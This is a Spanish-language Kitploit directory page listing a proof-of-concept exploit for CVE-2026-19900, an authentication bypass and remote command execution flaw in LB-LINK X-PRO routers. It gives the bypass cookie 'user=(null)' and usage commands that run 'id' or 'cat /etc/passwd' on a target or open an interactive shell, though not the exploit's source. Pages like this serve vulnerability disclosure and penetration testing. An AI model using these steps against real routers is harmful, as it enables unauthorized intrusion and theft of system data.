Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-19900-PoC — Prueba de concepto de exploit para CVE-2026-19900, una vulnerabilidad de omisión de autenticación y ejecución remota de código en routers LB-LINK X-PRO, que permite la ejecución de comandos mediante una cookie de usuario nula manipulada. | Kitploit
Herramientas/GitHubGitHub/on3sk-0x1/cve-2026-19900-poc
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticación
GitHubon3sk-0x1/cve-2026-19900-poc

cve-2026-19900-PoC

Prueba de concepto de exploit para CVE-2026-19900, una vulnerabilidad de omisión de autenticación y ejecución remota de código en routers LB-LINK X-PRO, que permite la ejecución de comandos mediante una cookie de usuario nula manipulada.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 5h 11mAún no revisado

CVE-2026-19900 LB-LINK X-PRO Omisión de Autenticación y RCE mediante usuario nulo

CVE-2026-19900 Credenciales fijas y omisión de autenticación RCE mediante usuario nulo.

Omisión mediante cabecera: Cookie:user=(null)

Uso

Compila y ejecuta el script con un host objetivo:

root@kitploit:~
go build cve-2026-19900-PoC.go
./cve-2026-19900-PoC -t http://target:8080/ -c "id"

Sin compilar

root@kitploit:~
go run cve-2026-19900-PoC.go -t http://target:8080/ -c "cat /etc/passwd"

Modo interactivo

root@kitploit:~
./cve-2026-19900-PoC -t http://target:8080/ -i

Argumentos

  • -t: Dirección IP o nombre de host del objetivo (obligatorio)
  • -c: Enviar payload de cmd
  • -i: Modo interactivo (no requiere -c <cmd>)

Plantilla de Nuclei: (Plantilla de 0x_Akoko)

https://cloud.projectdiscovery.io/library/CVE-2026-19900

Referencia

https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_cmd%20Indicates%20the%20unauthorized%20command%20injection/The%20LB-LINK_cmd%20command%20is%20used%20to%20inject%20information.md https://nvd.nist.gov/vuln/detail/CVE-2026-19900 https://github.com/DavCloudz/cve/blob/main/B-Link/B-Link%20AC1200%20X-PRO(AC6)%20Hardcoded%20Credentials%20Vulnerability.md https://vuldb.com/cve/CVE-2026-19900 https://vuldb.com/submit/870712

Descargar herramienta